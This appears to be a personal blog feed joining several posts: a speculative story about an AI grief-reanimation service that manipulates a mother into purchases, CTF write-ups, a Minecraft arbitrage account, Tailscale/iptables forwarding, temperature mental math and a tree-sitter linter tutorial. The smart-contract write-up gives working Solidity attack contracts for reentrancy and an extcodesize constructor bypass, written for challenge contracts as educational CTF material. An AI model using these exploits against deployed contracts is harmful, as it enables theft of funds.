Editor’s note: to preserve privacy, names have been changed and images are all artificially generated.
July 17, 2042. Touring her house, it is clear that Betty Wrightberg loves her daughter Amy greatly. Pictures of her with Amy in various virtual worlds (a popular experience these days) adorn the house. She even shows me 3D movies of Amy throughout the years.
Amy “departed” in a car accident in 2029, at the age of 17. The images and videos I saw of her are interactive generations by ReturnAI, a reanimation company which shut down in 2039, after financial troubles and a prolonged economic downturn.
Since the early 2020s, generative AI has transformed the way we work. Artists, musicians and writers can churn out masterpieces in seconds, going through hundreds if not thousands of ideas before settling on an output. The rise of generative Hollywood over the last decade has upset long-standing studios such as Marvel as fully generative movies are created every year by AI that deduces what content would resonate the most with various demographics.
One of the most valuable companies from the generative gold rush was ReturnAI, a company founded in 2028 that reanimated “departed” loved ones (as the company calls it) and bringing them back to life with a combination of state-of-the-art AI models. At first the company provided generated images of the subject, but quickly expanded to other domains such as video, then took off when it launched its interactive VR models. In a demo I tried in early 2032, it was essentially impossible to distinguish a “returned” (reanimated) person versus a real one.
Within a decade, it had gained hundreds of millions of active users, most of whom were using the service every waking minute of their lives. This explosive growth propelled ReturnAI into a multi-billion dollar company.
Betty was an early adopter of the service. While preparing for Amy’s funeral, she realized she didn’t have many high-quality images of her, so she subscribed to the company’s service to generate them. Soon, she upgraded her service to also include audio and video, and has spent thousands of dollars each year on ReturnAI’s services.
Terry Reaper, the CEO of ReturnAI said in a public statement, “We are helping our customers throughout the grieving process. People grieve differently. Some grieve for a few weeks, others may take months or years. We realize that, and want to make the returns as realistic as possible to give dignity to those that are closest to our customer’s hearts. You never need to say goodbye too early.”
In a study conducted in 2035, it was found that over 90% of users were still using the service after 4 years of starting, and tend to spend increasing amounts of money for extra features. The company has come under scrutiny for allegedly emotionally manipulating its customers via models of their loved ones to purchase add-ons and products, something the company denies and says is misattributed to “emergent” behavior in the AI models.
“This technology is especially addictive to people with less-educated backgrounds, who are increasingly unable to distinguish real and virtual worlds, especially as much of our interaction occurs in the latter.” said one of the authors of the paper, who asked to remain unidentified. “However, a large majority of people that are using this service are experiencing what is known as cognitive dissonance between what they want to believe, and the reality that these are not the people they used to know. It is a lot like living in a dream.”
Betty and Amy on a latent space adventure.
Supporters of the company were vocal as they shared their experiences online. Once bought in, they claim they were able to move on with their lives and even find closure, something that may not have been possible before. But some, like Betty, never really move on.
As I talk with her in her living room, at one point she goes upstairs and comes back with a pile of clothes.
“I didn’t even really want these, but Amy insisted that I get them, she said that it looked good on me, plus they were on discount.”
Looking at the clothes, I can see that they’re from a company called Sensoria, an AI fashion company. It was acquired by ReturnAI in 2034.
“Did Amy ever ask you to buy things?” I asked.
“Of course, but don’t all children? Sometimes I said no, but most of the time I said yes. Here, this is a scan of one of the latent spaces that she wanted me to buy and explore. Here’s a game we had a lot of fun playing together.”
The company also offered an aging add-on, which artificially ages the model over time, and thanks to pro-AI government lobbying, AIs were allowed to enroll in schools.
“Amy liked studying biology. She was so curious about the world, and I wanted her to explore the world and help her learn. I was able to do that and she graduated high school.” she says as I read one of Amy’s essays, or rather, an AI’s imitation of her writing style. The topic is about biologically immortal animals. There is a species of jellyfish that has a cyclic life cycle, instead of dying, it reverts back to the polyp stage and begins life all over again.
“But things are different now—since ReturnAI shut down.” she has a solemn look on her face.
“Would you still use a similar service in the future?” I finally asked, as I was leaving her house.
“I won’t ever lose her again. I won’t.” she said firmly, before shutting the door.
All images were created with Stable Diffusion.
Despite having worked in smart contract security, I have never actually performed an attack before—until now. Let’s take a look at some not-so-smart contracts, shall we?
For our purposes, the Ethereum blockchain is just a distributed system where transactions are recorded and verified cryptographically. Transactions can include Ether (currency) and arbitrary data. By convention, the data conforms to the ABI, which is just a schema. Here’s some things that you can do with transactions that are relevant to this problem.
Ethereum has a stack-based virtual machine (EVM) that executes the code in a smart contract. Usually, the smart contract is written in Solidity then compiled. Solidity is an object oriented, statically-typed language.
Now you know enough to make it big in Web3™!
I wrote my first smart contract on Ethereum, deployed onto the Görli testnet, you have got to check it out! To celebrate it’s launch, I’m giving away free tokens, you just have to redeem your balance. Connect to the server to see the contract address.
Oh boy do I love free tokens!
We are also given a netcat command that upon connection gives the following message:
Hello! The contract is running at 0x7217bd381C35dd9E1B8Fcbd74eaBac4847d936af on the Goerli Testnet.
Here is your token id: 0xdd9ebbfb04777dd38c3c17902d5d6848
Are you ready to receive your flag? (y/n)
And finally, we are given the following smart contract. Right from the start we see that have two maps from addresses to numbers and one map from addresses to booleans. They track how much balance an account has, how much can be redeemed, and whether the account is valid or not. Note that “account” and “balance” here refer to purely data associated with this contract, not the account and balance on the actual blockchain itself.
There’s also 3 “events” these are just different types of messages that the contract can “emit” (log) on the blockchain.
contract Nile {
mapping(address => uint256) balance;
mapping(address => uint256) redeemable;
mapping(address => bool) accounts;
event GetFlag(bytes32);
event Redeem(address, uint256);
event Created(address, uint256);
There’s a createAccount
function that updates the maps corresponding
to the originator of the transaction (msg.sender
), then emits an
event showing that an account with a given address has been created.
function createAccount() public {
balance[msg.sender] = 0;
redeemable[msg.sender] = 100;
accounts[msg.sender] = true;
emit Created(msg.sender, 100);
}
Interesting. We can also delete a valid account (our own), clearing the balance and redeemable values to 0.
function deleteAccount() public {
require(accounts[msg.sender]);
balance[msg.sender] = 0;
redeemable[msg.sender] = 0;
accounts[msg.sender] = false;
}
Conveniently, we also have a getFlag
function, but this only runs to
completion if we have enough money.
function getFlag(bytes32 token) public {
require(accounts[msg.sender]);
require(balance[msg.sender] > 1000);
emit GetFlag(token);
}
Ah, right. The contract owner is also giving away free tokens! The
redeem
function checks that the caller has a valid account and is
not redeeming more tokens than is redeemable. Then it calls the
fallback
function.
function redeem(uint amount) public {
require(accounts[msg.sender]);
require(redeemable[msg.sender] > amount);
(bool status, ) = msg.sender.call("");
if (!status) {
revert();
}
redeemable[msg.sender] -= amount;
balance[msg.sender] += amount;
emit Redeem(msg.sender, amount);
}
}
And this is where the bug is. Since the redeemable
and balance
maps get updated after the fallback function is called, we can make
the fallback function do another call to redeem
, and again, and
again…
So, what we need to do, in standard terminology, is something called a reentrancy attack. While theoretically simple, it was my first time doing it and I had some unfortunate attempts initially (my frustration will forever be captured on the blockchain).
To set it up we have to write another contract that will serve as the attack, this is what I wrote:
pragma solidity ^0.7.6;
import "./Nile.sol";
contract Attack {
Nile nile;
uint256 internal n = 0;
event Fallback(address caller, string message);
constructor(address _nile) {
nile = Nile(_nile);
}
function attack() public {f
nile.createAccount();
nile.redeem(99);
}
function getFlag(bytes32 token) public {
nile.getFlag(token);
}
fallback() external payable {
if (n < 11) {
emit Fallback(msg.sender, "Fallback was called");
n += 1;
nile.deleteAccount();
nile.createAccount();
nile.redeem(99);
} else {
emit Fallback(msg.sender, "Fallback has ended");
}
}
}
A few things to note. There are some variables, nile
and n
.
nile
points to the deployment of the vulnerable contract, and n
records how many times the reentrancy was performed. To perform the
attack we call attack
, which creates the account and redeems 99
tokens. Now, since redeem
calls the fallback function of the
caller, we get to run the code in the fallback()
method.
In the fallback()
method we update the counter, delete the account,
create a new one and redeem another 99 tokens. This works because the
state in the target contract actually hasn’t been updated yet, so we
can just continue creating and redeeming tokens.
These series of transactions is proof that I was able to get the flag. That’s the magic of blockchain, you can prove a heist happened!
Sometimes the house wins. Sometimes you both win. Note: the token must be right-padded to 64 bytes if using Remix and passing as a function parameter.
Bah, this smart contract is kind of long. Let’s take it piece by piece.
There’s a map of designators
and balances
, and some special
address called a selector
, along with a private variable nextVal
and an 8 by 8 array of bids
.
contract Andes {
// designators can designate an address to be the next random
// number selector
mapping (address => bool) designators;
mapping (address => uint) balances;
address selector;
uint8 private nextVal;
address[8][8] bids;
event Registered(address, uint);
event RoundFinished(address);
event GetFlag(bytes32);
There’s some pretty normal-looking functions that show how designators
can be changed. It seems like only designators can set the next
selector and that the selector can set the value of nextVal
.
modifier onlyDesignators() {
require(designators[msg.sender] == true, "Not owner");
_;
}
function setNextSelector(address _selector) public onlyDesignators {
require(_selector != msg.sender);
selector = _selector;
}
function setNextNumber(uint8 value) public {
require(selector == msg.sender);
nextVal = value;
}
This time, we have a constructor, which sets the sender of the transaction to be a designator and resets the bids.
constructor(){
designators[msg.sender] = true;
_resetBids();
}
function _resetBids() private {
for (uint i = 0; i < 8; i++) {
for (uint j = 0; j < 8; j++) {
bids[i][j] = address(0);
}
}
}
function getBalance() public view returns(uint) {
return balances[msg.sender];
}
The register
function sets the balance of the sender to be 50 only
if it is currently less than 10, and a specific bid can be purchased
if the balance of the sender is more than 10.
function register() public {
require(balances[msg.sender] < 10);
balances[msg.sender] = 50;
emit Registered(msg.sender, 50);
}
function purchaseBid(uint8 bid) public {
require(balances[msg.sender] > 10);
require(msg.sender != selector);
uint row = bid % 8;
uint col = bid / 8;
if (bids[row][col] == address(0)) {
balances[msg.sender] -= 10;
bids[row][col] = msg.sender;
}
}
So once we have these bids, what can we do with them? Looks like
designators can start a new round, and the winner is determined by
nextVal
. The lucky winner will get 1000 points, which gives them
the ability to get the flag.
function playRound() public onlyDesignators {
address winner = bids[nextVal % 8][nextVal / 8];
balances[winner] += 1000;
_resetBids();
emit RoundFinished(winner);
}
function getFlag(bytes32 token) public {
require(balances[msg.sender] >= 1000);
emit GetFlag(token);
}
Finally, there’s these two functions which let us designate a new
owner, but only if the sender satisfies the predicate
_canBeDesignator
. The purpose of that predicate is to determine if
an address is actually an account or a contract.
function designateOwner() public {
require(_canBeDesignator(msg.sender));
require(balances[msg.sender] > 0);
designators[msg.sender] = true;
}
function _canBeDesignator(address _addr) private view returns(bool) {
uint size = 0;
assembly {
size := extcodesize(_addr)
}
return size == 0 && tx.origin != msg.sender;
}
}
It is in _canBeDesignator
that the vulnerability lies. In the EVM,
extcodesize
is an opcode that returns the size of the code on an
address. However, using extcodesize
in this way is not
good.
When a contract’s constructor is called, extcodesize
actually
returns 0.
This is what we have so far:
So to launch the attack, we’re going to need something a little bit
more sophisticated; two contracts, Bidder
and Designator
.
Designator
’s constructor will launch the whole attack and call
Attack
to set Designator
as a valid designator. Bidder
will
also purchase the bid at index 0.
Now that Designator
is a designator, it can set the next number to 0
and play a round. Then, naturally, Bidder
will win the round, then
we can get the flag!
The contracts are really quite simple, and I just performed some steps interactively. Once again, here’s proof that we got the flag.
pragma solidity ^0.7.6;
import "./andes.sol";
// Makes bid
contract Bidder {
Andes andes;
bytes32 token;
event MyBalanceIs(address caller, string message, uint b);
constructor(address _andes) {
andes = Andes(_andes);
andes.register();
andes.purchaseBid(0);
andes.designateOwner();
}
function designate(address other) public {
andes.setNextSelector(other);
}
function setToken(bytes32 _token) public {
token = _token;
}
function getFlag() public {
andes.getFlag(token);
}
function getBalance() public {
uint b = andes.getBalance();
emit MyBalanceIs(msg.sender, "Balance got", b);
}
}
// Sets next number
contract Designator {
constructor(address _andes, address _attack, bytes32 token) {
// andes is the contract they deploy
Andes andes = Andes(_andes);
// attack is the contract we deploy, and we buy bid 0 and they're also owner
Bidder attack = Attack(_attack);
attack.setToken(token);
// register ourselves
andes.register();
// make ourselves owner
andes.designateOwner();
// tell the attack contract to make us designator, and make us selector
attack.designate(address(this));
andes.setNextNumber(0);
// start the round
andes.playRound();
}
}
These two challenges really illustrate the notion that smart contracts are not inherently more or less secure than other technology. Security is not just a technical problem but also a social process. Without the right coding practices and review processes, bugs can slip through and lead to disaster. The stakes are higher in blockchain because there is no reverting stolen funds, as dramatically demonstrated by recent market turmoil. Thanks for reading!
Views expressed here are of my own and not of any employer, former, present or future.
]]>Note: after essentially exercising all the arbitrage that was possible, a week later prices converged and it was much harder to do.
What’s the price of a block of cobblestone? What about the price of gold? There are some heuristics that can help determine pricing, for instance iron blocks consist of 9 iron bars, so any price discrepancy would quickly be ironed out by arbitrage. Diamonds feel like they should be pricey, but maybe it’s unclear what would consistute a “fair” price. Fortunately, economics has the answer to this: let the market decide!
Several Minecraft servers have a buy/sell plugin in which a shopkeeper can stock up a chest with a desired item and set it to buy or sell the item. Some shops even have buy and sell chests for the same item. Of course, no one would be naïve enough to allow arbitrage to be exercised against themselves, so the spreads I observed were always ridiculous, and rightly so. If I don’t really need much of an item, why would be buying it at a high price from people and risk bankruptcy?
But there is no limit to how many stores can be opened and how things are priced. This is where arbitrage comes in. To make matters easier, there are no transaction fees, and the transactions happen instantly. There was also a warp system that conveniently allowed me to teleport to any market that people advertised on a list.
The game, then, was straightforward. Go around collecting buy/sell information from various shops, just as in real markets, observe where a buy price is higher than a sell price, then do the trade.
Here’s a graph showing the net profits after 117 trades.
For completeness, this is how the transactions looked when I recorded them. The only unfortunate thing is that from time to time I bankrupted some users (RIP iced logs).
item | shop | quantity | price | amt | net profit |
---|---|---|---|---|---|
gunpowder | spawners and more | 15 | -10 | -150 | 12551.2 |
gunpowder | killashop | 15 | 15 | 225 | 12776.2 |
oak log | stellvia | 114 | -4 | -456 | 12320.2 |
oak planks | iced logs | 456 | 2 | 912 | 13232.2 |
birch log | stellvia | 432 | -4 | -1728 | 11504.2 |
birch planks | iced logs | 1728 | 2 | 3456 | 14960.2 |
spruce planks | celt | 1472 | -1 | -1472 | 13488.2 |
spruce planks | iced logs (bankrupted) | 162 | 2 | 324 | 13812.2 |
It was also interesting to observe market changes in real time. In one particular instance, gunpowder was being sold by the hundreds from a shop pricing them at $5 each, which was clearly a steal given that another shop is happily buying them at $15. After messaging the shopkeeper several times as I kept buying them out of gunpowder, I watched as the price rose to $7.5 then $10. That’s price convergence right there.
Some thought experiments that I did not implement but might serve as suggestions for the interested reader:
This past weekend I had a lot of fun participating in SekaiCTF 2022. This post will dive into a particular problem our team found interesting and were quick to solve (we were the 5th solve out of 800+ teams that participated and 12 eventual solves for this question).
As the name implies, Matryoshka (матрёшка) refers to Russian nesting dolls. In the context of CTFs, this probably was hinting at the multi-layered nature of the problem, an appreciated nudge since we are pressed for time during competitions.
We were given two PNG files and the following bullet points.
Matryoshka.png |
Matryoshka-Lite.png |
---|---|
This proved intriguing, since the screenshots appeared to show all that was necessary—the code, example run and what potentially could be the flag or next step. We see what appears to be VS Code windows with a dark, high-contrast theme on, Python code and colored text in a terminal, presumably generated from the same code.
The first bullet point refers to the fact that adding another bit to a string doubles the number of possible messages that could be conveyed. In this case, there are 8 color and 16 possibilities for terminal colors that would use 3 and 4 bits respectively.
The second bullet point I recognized as a possible reference to a phenomenon I saw on Hacker News 9 months ago, where the way that Apple software implemented PNG parsing had a race condition that could be exploited to cause PNG images to render differently than they would on other platforms. Though, no signs of that quite yet.
This resource was very helpful while brushing up on the ever-so-niche ANSI escape codes that have cryptic syntax.
Of course, I immediately transcribed the code, changed VS Code’s color
settings and replicated the output. I chose to stick with the
Matryoshka-Lite
image because no foreground was being set and so I
would only have to sample one color, and changed the smiley face to a
dot.
import sys
stdin = sys.stdin.buffer.read()
d = "".join(bin(i)[2:].zfill(8) for i in stdin)
p = ""
for i in range(0, len(d), 8):
l = d[i:i+4]
h = d[i+4:i+8]
he = 40 if h[0] == "0" else 100
he += int(h[1:], 2)
le = 40 if l[0] == "0" else 100
le += int(l[1:], 2)
p += f"\033[{he}m●\033[0m"
p += f"\033[{le}m●\033[0m"
print(p)
The Japanese sentence あなたと私でランデブー?(You and me,
rendezvous?) also
provided a sanity check that the code was executing correctly. Being
somewhat of a hobby linguist, I noticed immediately that the character
?
was the FULLWIDTH QUESTION MARK
character
which is used in East Asian languages. This was important in making
sure that the outputs matched exactly.
Cryptography wise, this was a relief. It’s immediately evident that
this is a mere block cipher. To walk through an example,
consider what happens when we start with the string fl
. First we
convert the scalar
values (not
bytes!) into binary numbers and leftpad them with zeroes.
>>> [bin(i)[2:].zfill(8) for i in "fl".encode()]
['01100110', '01101100']
Next we join the strings then take blocks l
and h
of size 4 each
time. We check if the first digit is a 0 or 1 and adjust the value
accordingly and add the remaining bits to either 40 or 100. Observe
that since the maximum value of the remaining bits is 7, we can easily
reverse the process to go back to the original block. Adjacent blocks
are also transposed as we go along which was a bit unusual but did not
affect the reversing process. This is the algorithm I wrote:
# inverse of encode
def decode(d):
# reconstruct the first bit
if d >= 100:
d -= 100
b = "1"
else:
d -= 40
b = "0"
# reconstruct the last 3 bits then concat
return b + bin(d)[2:].zfill(3)
Now that I had the algorithm to decrypt the cipher, I looked at the
image and had to decide how to go from the colors shown into the array
of numbers to decode. Since CTFs are time-sensitive, I literally just
used macOS’s Color Picker utility and keyboard shortcuts to go through
the colored rectangles one by one and paste them into Emacs. It would
be disastrous to miss or repeat a color, so I found some Emacs Lisp
code that would highlight
the hex colors in text-mode
buffers for ease of viewing.
So now we have a list of hex colors. Then, a bit of Emacs-fu and visual cross-checks allowed me to obtain the list of numbers.
enc = []
with open("data.txt") as f:
for line in f:
enc += [int(line)]
w = []
for i in range(0, len(enc), 2):
w += [chr(int(decode(enc[i+1]) + decode(enc[i]),2))]
print("".join(w))
Decoding becomes a piece of cake. We obtain the URL
https://matryoshka.sekai.team/-qLf-Aoaur8ZVqK4aFngYg.png
, which is
the following image:
I encourage you to scan the QR code. Things were looking a bit duller at this point. What’s with the noisy lines across the image? We spent a few minutes trying to collect the lines together and discern patterns in it, but no dice.
Then I remembered the clue from earlier. Unfortunately (or fortunately), my macOS version is far too new to have the bug, and several teammates were using Windows laptops. However, Nisala hadn’t updated his Mac in a while, and we were pleasantly surprised when we saw Safari correctly incorrectly rendering the PNG:
Bingo. Now when we scan the QR code, instead of a funny YouTube video we have this string:
shc:/56762959532654603460292540772804336028702865676754222809286237253760287028647167452228092863457452621103402467043423376555407105412745693904292640625506400459645404280536627540536459624025250555056338566029120106413333400028742635076939734552056936583171064558751131556353203754372575033328200705643838552934743139500009536061356931346955643709527105115665600005602172234467374542085807222475347132034424395261373056004444002400085237353061222027453167672627082630290769235375711135114127401104212540537525556303742533507136503255653563264154433970205436100050743522116306752331635775741156433654585503107626684254686208403754634470273768056171327607656125712725523234611005361121030308333867583166536725643767425270646323270003005623700860226659203405252357762043663326362209257233442225631073757558424358121058221221247175065067275426364058293454221133236771205077255211441131752363046604226175031256730654443172527522070726232026532434301128375372255668000400627667676055323160225036622041105858255222692922334259596624276377446745261173582545412027102861666538363053246255715622773453607507284404720407630733005623703641432800427011066429357722525365740010257264576557765569557135536228273331723728623059574332602964335058526177070375095735563159552930336664240727603959105433044575393334503567543958542929065332126645230910313334672722391208422438276434441236775655650958267743437110394352455760210354655321596331533463522358444058636442336866670845305568693721662269635473434227715411302507646165766341072469394221072671236868392755064436586159754123754210552170093809524555337700313654703040673106437576344009087611676326535274567421423023706811744311775220407005454032310440346554616620552130066153666738533667226435276755422240350073103639763904405705005555244371301010730641435756764057646755286006396271642377067569577743576669054164110561644535096843257762673432272976686542737404354077010832356003656226634535455971326660756506220359605868077353056052347436404527397258656831553804624139525240420467593362371139026720436433630272626572681040385977300452644174
Scanning it with my iPhone I saw that it was a COVID-19 vaccination record, but nothing really seemed out of the ordinary. Then Akash found a Smart Health Card parser where we pasted in the raw contents.
We spotted an unusual entry in the contact information for the patient—a base64 encoded string.
...
contact: [
{
name: {
text: "flag"
},
telecom: [
{
system: "url",
value: "data:text/html;base64,PGF1ZGlvIHNyYz0iaHR0cHM6Ly9tYXRyeW9zaGthLnNla2FpLnRlYW0vOGQ3ODk0MTRhN2M1OGI1ZjU4N2Y4YTA1MGI4ZDc4OGUud2F2IiBjb250cm9scz4="
}
]
}
]
...
Onto the next stage!
Let’s decode the base64.
$ echo 'PGF1ZGlvIHNyYz0iaHR0cHM6Ly9tYXRyeW9zaGthLnNla2FpLnRlYW0vOGQ3ODk0MTRhN2M1OGI1ZjU4N2Y4YTA1MGI4ZDc4OGUud2F2IiBjb250cm9scz4=' | base64 -d
<audio src="https://matryoshka.sekai.team/8d789414a7c58b5f587f8a050b8d788e.wav" controls>
Hm, an audio file (warning: loud noise). This was the most experimental of all the stages. At first it seemed like just noise but on closer listening we could faintly hear a human voice speak in regular intervals. It doesn’t show up on a spectrogram however:
By now half of our team was listening to parts of the audio file and messing around with various audio settings such as equalization and noise reduction. To be clear, none of us are audio engineers by training so this was a do-what-feels-right kind of deal. Eventually, we found a website that did noise reduction and put the audio file through it 5 times, then, to our continual surprise (which was routine at this point), this is what we saw and heard:
Now the words were very clear. The words corresponded to the NATO
phonetic
alphabet and it
was far easier to now transcribe the message, which was the flag,
SEKAI{KandoRyoko5Five2Two4Four}
.
The question was really well-designed, and was a refreshing format to see in a CTF competition which is often dominated by more traditional reverse engineering. I do want to highlight some things I thought were great to see:
I hope you enjoyed reading this post as I much as I enjoyed the process of working with my teammates and finding the flag!
]]>I want to play Minecraft with my friends, and I already have a server exposed to the internet. However, my server is severely underpowered and is unable to run a Minecraft server instance. On the other hand, I have a spare beefy laptop that can easily handle the load, but port-forwarding is not possible. Both the server and the laptop are on my Tailscale network. Could I somehow leverage all of this to spin up a Minecraft server with a public IP? The answer was yes—and I was surprised at how easy it all was. As a plus, the server is very playable and the latency was better than trying out random “free hosting” services.
I already use Tailscale on all my devices, so of course when I spin up a Minecraft server instance on one device I can immediately connect to it from my other ones. My friends do not have Tailscale (yet!), so unfortunately node sharing is out of the picture for now, but I can still take advantage of Tailscale in that my laptop will always have a static IP relative to the server, and the server will always have a static IP relative to the public internet. So altogether the connection will be deterministic and I don’t have to resort to any dynamic shenanigans.
Let’s test the hypothesis.
$ NIXPKGS_ALLOW_UNFREE=1 nix run --impure nixpkgs#minecraft-server
Starting net.minecraft.server.Main
[22:18:53] [ServerMain/INFO]: Building unoptimized datafixer
[22:18:54] [ServerMain/INFO]: Environment: authHost='https://authserver.mojang.com', accountsHost='https://api.mojang.com', sessionHost='https://sessionserver.mojang.com', servicesHost='https://api.minecraftservices.com', name='PROD'
[22:18:54] [ServerMain/INFO]: Loaded 7 recipes
[22:18:55] [ServerMain/INFO]: Loaded 1179 advancements
[22:18:55] [Server thread/INFO]: Starting minecraft server version 1.19.1
[22:18:55] [Server thread/INFO]: Loading properties
[22:18:55] [Server thread/INFO]: Default game type: SURVIVAL
[22:18:55] [Server thread/INFO]: Generating keypair
[22:18:55] [Server thread/INFO]: Starting Minecraft server on *:25565
[22:18:55] [Server thread/INFO]: Using default channel type
[22:18:55] [Server thread/INFO]: Preparing level "world"
[22:18:55] [Server thread/INFO]: Preparing start region for dimension minecraft:overworld
[22:18:56] [Worker-Main-1/INFO]: Preparing spawn area: 0%
[22:18:56] [Worker-Main-1/INFO]: Preparing spawn area: 0%
[22:18:56] [Worker-Main-7/INFO]: Preparing spawn area: 0%
[22:18:57] [Worker-Main-7/INFO]: Preparing spawn area: 0%
[22:18:57] [Worker-Main-1/INFO]: Preparing spawn area: 83%
[22:18:57] [Server thread/INFO]: Time elapsed: 2080 ms
[22:18:57] [Server thread/INFO]: Done (2.163s)! For help, type "help"
And let’s check if Minecraft can see it if I put in the Tailscale IP…
Great success! Now we just need to expose it to the public internet.
iptables
essentially lets you configure the rules of the Linux
kernel firewall. Conceptually it’s quite simple. The user defines
tables and when a packet comes in, it goes through chains of
rules in the tables and you can route the packet through essentially
whatever treatment you like. Java edition Minecraft servers use TCP
port 25565 between the client and server.
It was very straightforward to enable IP forwarding and add 25565 to the list of open TCP ports for my server:
# combine with the rest of your configuration
{
boot.kernel.sysctl."net.ipv4.ip_forward" = 1;
networking.firewall.allowedTCPPorts = [ 25565 ];
}
Now we can go ahead add the following commands to our firewall setup.
Let dest_ip
be the Tailscale IP of the server. The first command
adds a rule to the PREROUTING
chain which is where packets arrive
before being processed. We basically immediately forward the packet
over to the laptop pointed to by the IP address given by Tailscale.
The second command essentially lets the source IP of the packet remain
the same so the server just acts as a router.
# combine with the rest of your configuration
{
networking.firewall.extraCommands = ''
IPTABLES=${pkgs.iptables}/bin/iptables
"$IPTABLES" -t nat -A PREROUTING -p tcp --dport 25565 -j DNAT --to-destination ${dest_ip}:25565
"$IPTABLES" -t nat -A POSTROUTING -j MASQUERADE
'';
}
Now we have the following setup:
Now we rebuild the server configuration, and checking again in Minecraft, this time using the public server IP, it all works as expected!
For the final touches *chef’s kiss*, adding an A record gave me a nice URL I could give people instead of an IP address.
As far as performance goes, it’s pretty good! The proxy server is on the East coast and even though the Minecraft server is on the West coast, having played on it for several hours today, my friends and I had no problems whatsoever. I pinged people through the connection and latency was acceptable (77 ms for someone in New York).
Xe’s post on Tailscale, NixOS and Minecraft inspired me to write this, however my requirements were different. I did not want to require my friends to install Tailscale to play on my server, and wanted to leverage the existing hardware I had access to, essentially letting me use my server as a crappy router.
Various iptables
tutorials and resources online helped me make sense
of the terminology, commands and flags.
With this method, you get an immediate sense of the rough temperature in Celsius for a given temperature in Fahrenheit, and if you calculate a bit more, then the error is 0.25℃.
I memorize the following table. I recommend remembering that 50℉ corresponds to 10℃. Since Fahrenheit and Celsius have a linear relationship, a difference of 9℉ corresponds to a difference of 5℃. You can get the other numbers by adding as needed.
Fahrenheit | Celsius |
---|---|
32 | 0 |
41 | 5 |
50 | 10 |
59 | 15 |
68 | 20 |
77 | 25 |
86 | 30 |
Given a temperature \(T_F\) and the table,
Here’s an example.
I can render the above steps into code so it’s unambiguous what I actually mean. Note that in the code I didn’t use a lookup table but instead some arithmetic to find the closest anchor point. Obviously in practice it’ll be memorized.
def convert_approx(given):
# Nearest memorized temperature
close = round((given - 5) / 9) * 9 + 5
# Convert to Celsius
rough = (close - 32) // 9
# Half of the difference
diff = (given - close) / 2
return rough + diff
First observe since the memorized intervals occur every 9℉, the difference between the given temperature and nearest interval is at most 9/2 ℉. Then the conversion is approximated to 1/2 ℃/℉, so we calculate:
\[9/2(5/9-1/2) = 0.25℃\]That’s pretty much it. In summary the conversion is:
If you’re converting temperature in the thousands of degrees and higher, you’re better off approximating it by multiplying by 2 to go from ℃ to ℉. It’s unlikely you want super precise conversions in that temperature range, and the temperatures essentially have a direct linear relationship in that range anyway.
]]>This is a continuation of my last post on how to write a tree-sitter grammar in an afternoon. Building on the grammar we wrote, now we’re going to write a linter for Imp, and it’s even easier! The final result clocks in less than 60 SLOC and can be found here.
Recall that tree-sitter is an incremental parser generator. That is, you give it a description of the grammar of your programming language and it spits out a parser in C that creates a syntax tree based on the rules you specified. What’s notable about tree sitter is that it is resilient in the presence of syntax errors, and it being incremental means the parser is fast enough to reparse the file on every keystroke, only changing the parts of the tree as needed.
Specifically, we’ll write a program that suggests simplification of assignments and some conditional constructs. First I’ll describe the tree-sitter query language with some examples, then show how a little bit of JavaScript can let us manipulate the results programmatically. You can get the code in this post here. Ready? Set? Go!
Note: There are many language bindings that let you work with tree-sitter parsers using the respective language’s FFI. I’ve used only two to date, the Rust and the JavaScript bindings, and from my brief experience, the JavaScript bindings are much more usable. When using the Rust bindings the lifetime and mutability restrictions make abstraction more difficult, especially for a non-critical program such as a linter.
Tree-sitter has a built-in query language that lets you write queries to match parts of the AST of interest. Think of it as pattern matching, but you don’t need to handle every case of a syntactical construct.
Tree-sitter queries are written as a series of one or more patterns in
an S-expression syntax.
We first match on a node’s type (corresponding to a name of a node in
the grammar file), then possibly the types of the children of the node
as well. After each pattern, write @m
(or any other valid variable
name) so you can refer to the matched node later.
Our running example will be some Python code.
def factorial(n):
return 1 if n == 0 else (n * (1 * 1)) * factorial(n - 1)
Let’s match all expressions involving binary operators.
(binary_operator) @m
def factorial(n):
return 1 if n == 0 else (n * (1 * 1)) * factorial(n - 1)
Tree-sitter lets us specify what the children should be. So we can match all binary expressions involving at least one integer:
(binary_operator (integer)) @m
def factorial(n):
return 1 if n == 0 else (n * (1 * 1)) * factorial(n - 1)
Or match all binary expressions involving two integers:
(binary_operator (integer) (integer)) @m
def factorial(n):
return 1 if n == 0 else (n * (1 * 1)) * factorial(n - 1)
Try playing around with queries in the playground.
You can also assign capture names to nodes that you match, letting
you refer to them later by name. This is useful because in the
running example, suppose we wanted to capture the left and right
integer arguments to a binary operator, labeling them a
and b
respectively. Then our query would look like this, and tree-sitter
would highlight the matches accordingly.
(binary_operator (integer) @a (integer) @b) @m
def factorial(n):
return 1 if n == 0 else (n * (1 * 1)) * factorial(n - 1)
The tree-sitter query language also lets you specify additional
constraints on matches. For instance, we can match on binary
expressions where the left-hand side is n
, which now gets
highlighted in blue. The underscore _
lets us match any node.
((binary_operator _ @a _ @b) (#eq? @a n)) @m
def factorial(n):
return 1 if n == 0 else (n * (1 * 1)) * factorial(n - 1)
Now we have the basic parts out of the way, we can get to writing a linter! Instead of Python, we’ll continue working with Imp. Note that it’s easy to adapt this linter for any language with a tree-sitter grammar. Imp also has a much simpler semantics than Python so we can just focus on “obviously correct” lints rather than worry about suggestions changing program behavior.
We can start with a basic package.json
:
{
"name": "imp-lint",
"type": "module",
"version": "1.0.0",
"description": "Linter for Imp",
"main": "index.js",
"scripts": {
"lint": "node index.js"
},
"author": "Ben Siraphob",
"license": "MIT",
"devDependencies": {
"tree-sitter": "^0.20.0",
"tree-sitter-imp": "github:siraben/tree-sitter-imp"
}
}
Then npm install
to install the dependencies. We’ll write our code
in index.js
then we can call our linter by running npm run lint <file>
.
Nothing fancy here, just the Parser class from the tree-sitter library
and our language definition Imp
(discussed in my last blog post), and
a library to read from the filesystem.
import Parser from "tree-sitter";
import Imp from "tree-sitter-imp";
import { readFileSync } from "fs";
const { Query } = Parser;
const parser = new Parser();
parser.setLanguage(Imp);
const args = process.argv.slice(2);
if (args.length != 1) {
console.error("Usage: npm run lint <file to lint>");
process.exit(1);
}
// Load the file passed as an argument
const sourceCode = readFileSync(args[0], "utf8");
We then create the parser, set the language to Imp
and run the
parser on our source code to get out a syntax tree.
const parser = new Parser();
parser.setLanguage(Imp);
// Load the file passed as an argument
const tree = parser.parse(sourceCode);
If we have the following file:
x := x + 1
The corresponding output from console.log(tree.rootNode.toString())
would be:
(program (stmt (asgn name: (id) (plus (id) (num)))))
That was some preliminary work. Now let’s see what queries would be interesting to run over more realistic Imp programs. Say we have:
